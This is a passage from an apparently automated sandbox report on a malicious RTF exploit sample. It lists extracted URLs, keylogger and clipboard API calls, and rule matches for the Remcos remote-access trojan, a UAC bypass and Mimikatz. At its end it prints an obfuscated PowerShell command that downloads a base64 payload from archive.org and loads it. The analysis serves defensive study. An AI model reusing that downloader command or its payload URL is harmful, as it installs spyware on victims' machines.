                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.394160239.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.645253852.0000000000459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 0000000F.00000002.392868130.000000000037C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/GK
                  Source: RegAsm.exe, 00000017.00000002.645240047.000000000032C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/qK
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 00000014.00000002.646323313.00000000002B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: RegAsm.exe, 0000000D.00000002.396938042.00000000003F3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netP
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382702035.0000000002DF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVUF;HqRbase64Content
                  Source: bhvB683.tmp.13.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 00000014.00000002.652320409.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match  File source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR

E-Banking Fraud

Source: Yara match  File source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0041CA73 SystemParametersInfoW

System Summary

Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf, type: SAMPLE  Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE  Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE  Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3568, type: MEMORYSTR  Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR  Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR  Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\SysWOW64\wscript.exe  COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZV